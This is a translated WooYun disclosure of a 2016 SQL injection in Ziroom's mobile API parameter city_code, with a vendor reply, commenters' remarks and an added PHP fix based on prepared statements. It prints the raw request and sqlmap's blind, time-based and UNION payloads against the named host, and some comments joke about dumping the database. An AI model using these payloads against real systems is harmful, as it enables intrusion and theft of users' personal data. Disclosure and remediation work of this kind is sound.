
Vulnerability summary    Followers: 24

Defect ID: wooyun-2016-0199365

Title: SQL injection vulnerability in the Ziroom (自如友家) app affects 415 tables and over 1.98 million records

Vendor: homelink.com.cn

Author: 路人甲

Submitted: 2016-04-22 17:16

Fixed: 2016-06-06 21:30

Published: 2016-06-06 21:30

Vulnerability type: SQL injection

Severity: High

Self-assessed Rank: 20

Status: confirmed by vendor

Source: http://www.wooyun.org; for questions or help, contact [email protected]



Vulnerability details

Disclosure status:

2016-04-22: Details sent to the vendor, awaiting vendor response
2016-04-22: Vendor confirmed; details disclosed to the vendor only
2016-05-02: Details disclosed to core white hats and domain experts
2016-05-12: Details disclosed to regular white hats
2016-05-22: Details disclosed to intern white hats
2016-06-06: Details disclosed to the public

Brief description:

SQL injection in the Ziroom (自如友家) app, affecting 415 tables and over 1.98 million records

Detailed description:

Link and parameters (raw request as captured; the injectable parameter is city_code):
POST /index.php?_p=api_mobile&_a=get_hotSearchWords HTTP/1.1
Content-Length: 190
Content-Type: application/x-www-form-urlencoded
Host: interfaces.ziroom.com
Connection: close
User-Agent: Apache-HttpClient/UNAVAILABLE (java 1.4)
network=WIFI&sign=28d489fc766c0f3ab1ecb8daca16c14a&ip=192.168.100.33&uid=bffa0b4c-ba27-4014-88d7-22edb9cf357b&timestamp=1461314033&city_code=110000&app=v3.3.1&os=android%3A5.1&model=8681-A01

Proof of vulnerability (sqlmap output, quoted as recorded):

[*] starting at 16:55:01
[16:55:01] [INFO] parsing HTTP request from 'yy.txt'
[16:55:02] [INFO] resuming back-end DBMS 'mysql'
[16:55:02] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: city_code (POST)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: network=WIFI&sign=28d489fc766c0f3ab1ecb8daca16c14a&ip=192.168.147.33&uid=bffa0b4c-ba27-4014-88d7-22edb9cf357b&timestamp=1461314033&city_code=110000 AND 1153=1153&app=v3.3.1&os=android:5.1&model=8681-A01
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
Payload: network=WIFI&sign=28d489fc766c0f3ab1ecb8daca16c14a&ip=192.168.147.33&uid=bffa0b4c-ba27-4014-88d7-22edb9cf357b&timestamp=1461314033&city_code=110000 AND (SELECT * FROM (SELECT(SLEEP(5)))yfFI)&app=v3.3.1&os=android:5.1&model=8681-A01
Type: UNION query
Title: Generic UNION query (NULL) - 1 column
Payload: network=WIFI&sign=28d489fc766c0f3ab1ecb8daca16c14a&ip=192.168.147.33&uid=bffa0b4c-ba27-4014-88d7-22edb9cf357b&timestamp=1461314033&city_code=110000 UNION ALL SELECT CONCAT(0x7170707071,0x57724b52437841506852734e69546e4a4b567079686d587a6b625754486470416377694a7a655373,0x71766b7171)-- sKhk&app=v3.3.1&os=android:5.1&model=8681-A01
---
[16:55:02] [INFO] the back-end DBMS is MySQL
web application technology: PHP 5.4.22
back-end DBMS: MySQL 5.0.12
[16:55:02] [INFO] fetching tables for database: 'newziroom'
[16:55:02] [INFO] the SQL query used returns 415 entries
Database: newziroom
[415 tables]
[16:55:02] [INFO] fetched data logged to text files under

[Screenshot: 2.png]

[Screenshot: 1.png]


Remediation:

Parameter filtering!

Copyright notice: please credit 路人甲@乌云 when reposting.
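Added illustration of the "parameter filtering" suggested above, written for this report and not the vendor's code: the string-concatenation pattern that lets a city_code value such as "110000 AND 1153=1153" change the query, beside a version that validates the value and binds it as a prepared-statement parameter. The table and column names (t_hot_search, keyword), the function names and the DSN are assumptions; only the endpoint and the city_code parameter come from the report.

```php
<?php
// Added example for this report, not the vendor's code. Table, column and
// connection details are assumptions; city_code is the parameter from the report.

// Vulnerable pattern: the POST value is pasted straight into the SQL text, so
// "110000 AND 1153=1153" or "110000 UNION ALL SELECT ..." becomes part of the
// query. This is the behaviour the sqlmap output above detects.
function getHotSearchWordsUnsafe(mysqli $db, array $post) {
    $sql = "SELECT keyword FROM t_hot_search WHERE city_code = " . $post['city_code'];
    return $db->query($sql);
}

// Hardened version: check the shape of the input, then bind it as a parameter
// so the database server never interprets it as SQL.
function getHotSearchWordsSafe(PDO $db, array $post) {
    $cityCode = isset($post['city_code']) ? $post['city_code'] : '';
    // The report's city_code values are six-digit codes (110000 for Beijing);
    // anything else is rejected before it reaches the query.
    if (!preg_match('/^\d{6}$/', $cityCode)) {
        http_response_code(400);
        return array();
    }
    $stmt = $db->prepare(
        'SELECT keyword FROM t_hot_search WHERE city_code = :city_code LIMIT 20');
    $stmt->bindValue(':city_code', $cityCode, PDO::PARAM_STR);
    $stmt->execute();
    return $stmt->fetchAll(PDO::FETCH_COLUMN);
}

// Assumed connection; disabling emulated prepares makes MySQL do the binding.
$db = new PDO('mysql:host=127.0.0.1;dbname=newziroom;charset=utf8', 'app', 'secret',
    array(PDO::ATTR_EMULATE_PREPARES => false,
          PDO::ATTR_ERRMODE => PDO::ERRMODE_EXCEPTION));
header('Content-Type: application/json');
echo json_encode(getHotSearchWordsSafe($db, $_POST));
```

The validation step alone would already stop the boolean, time-based and UNION payloads shown above; the prepared statement is what keeps the endpoint safe if the input rules are relaxed later.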


Vulnerability response

Vendor response:

Severity: Medium

Vulnerability Rank: 6

Confirmed: 2016-04-22 21:24

Vendor reply:

Legacy code issue; thanks for the heads-up, we are working on it!

Latest status:

None yet


Vulnerability comments:

Comments

  1. 2016-04-22 20:24 | Freebug ( regular white hat | Rank:106 vulns:39 | Being a rogue is a noble profession!)

    Front row, leaving my name here.

  2. 2016-04-22 22:54 | 踏歌公子 ( regular white hat | Rank:241 vulns:50 | Forty years of lamplight through night rain in the wild; one sword, one flute into the mortal world! Heartbroken...)

    @xsser A vendor like this, I can only laugh. If it were an attacker, would he care whether it's old code or new code? He knows your current business code has a hole and he can dump your 451 tables and the 1.98 million records in some user table. A Rank of 6 says everything about how cheap user data is in the vendor's eyes. As a Ziroom tenant, I'd say this vendor's understanding of security is garbage!

  3. 2016-04-22 22:55 | 踏歌公子 ( regular white hat | Rank:241 vulns:50 | Forty years of lamplight through night rain in the wild; one sword, one flute into the mortal world! Heartbroken...)

    @踏歌公子 415

  4. 2016-04-22 23:00 | Freebug ( regular white hat | Rank:106 vulns:39 | Being a rogue is a noble profession!)

    @踏歌公子 +1

  5. 2016-04-22 23:32 | 孤独男孩 ( intern white hat | Rank:44 vulns:15 | Focused on network and information security, vulnerability discovery, code auditing, cloud...)

    @踏歌公子 +1

  6. 2016-04-22 23:38 | prolog ( regular white hat | Rank:853 vulns:179 )

    @踏歌公子 +1

  7. 2016-04-23 04:29 | Bloodwolf ( intern white hat | Rank:47 vulns:8 | whoami)

    App vulnerabilities really are cheap these days; just dump the database first and go do big data with it.

  8. 2016-06-06 21:40 | heartk ( regular white hat | Rank:122 vulns:33 | Keep that passion in your heart, hold on to that dream.)

    @孤独男孩 +1

  9. 2016-06-06 21:40 | 邪少 ( intern white hat | Rank:98 vulns:18 | 百里长苏)

    @踏歌公子 +1, asking for the dump